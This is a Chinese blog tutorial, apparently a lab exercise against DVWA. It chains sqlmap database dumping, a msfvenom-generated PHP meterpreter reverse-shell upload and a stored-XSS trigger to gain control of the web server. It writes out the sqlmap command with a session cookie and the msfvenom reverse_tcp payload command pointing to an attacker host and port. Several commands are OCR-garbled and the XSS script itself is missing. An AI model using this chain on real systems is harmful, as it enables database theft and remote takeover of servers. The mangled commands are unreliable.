使用html链接上传木马,通过XSS漏洞进行上传木马文件的过程

然后利用前面的内容构造如下命令:

http://192. 168, 157, 144/dvwa/vulnerbilities/sq11/71d-16aubmit-submit"

--cookie-"security=low: PHPSESSID-b523(41bb19ecca9a1d0b2b90fecc09b" --dbs --batch启动sqlmap之后的使用界面如所示。启动sqlmap之后的使用界面,执行该命令可以显示Web服务器系统中数据库里的内容,如图所示。这样一来,整个数据库中的信息就都暴露给攻击者了。除此之外,攻击者甚至可以将这个跨站漏洞和上传漏洞相结合,实现对整个服务器的控制。首先准备好要上传到Web服务器的恶意PHP文件,这里我们还是使用msfvenom命令,然后将生成的PHP代码保存在一个文本文件中,将其命名为shell.php。执行以下命令之后就会生成一个shell.php文件,如图4-87所示,该文件位于var目录中。msfvenom -p php/meterpreter/reverse_tcp 1host=192.168.157.130 1port-4444-f raw-o/root/shell.php

4fd4bea21bcd552d02807f3d004c7a94.png

然后我们切换到DVWA中的File Upload界面,在这个界面单击Browse按钮切换到root目录,然后选中shell.php文件并上传,如下所示。

生成一个shell.php,切换到上传漏洞页面,接着在Metasploit中启动这个木马文件对应的主控端handler,启动的方法和之前的一样,启动之后。接下来我们只需要利用跨站漏洞来提交一段执行木马的脚本,但是这里有一个问题就是当前Message文本框的长度不足以插入一个较长的脚本,需要在该文本框上单击風标右键然后选择“Inspect Element(Q)”选项来查看页面的代码,如下所示。

在Metasploit中打开的handler下面就是这个文本框的静态代码,我们将里面的maxlength的值从50修改为500。修改 Message 文本框长度,现在我们已经修改了文本框的大小,接下来向其中输入下面的脚本。

这个脚本包含了刚刚上传的木马文件所在的目录,当用户查看到我们刚刚提交的脚本之后,这个木马文件shell.php就会执行。在跨站脚本中包含刚上传文件的位置,这个木马文件执行之后,会反向连接到攻击者刚刚启动的handler上,以此获得目标服务器的控制权。现在攻击者已经完全获得了目标服务器的完全控制权,他可以通过获得的Meterpreter来完成几乎所有的渗透操作。例如使用sysinfo查看目标系统的详细信息。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值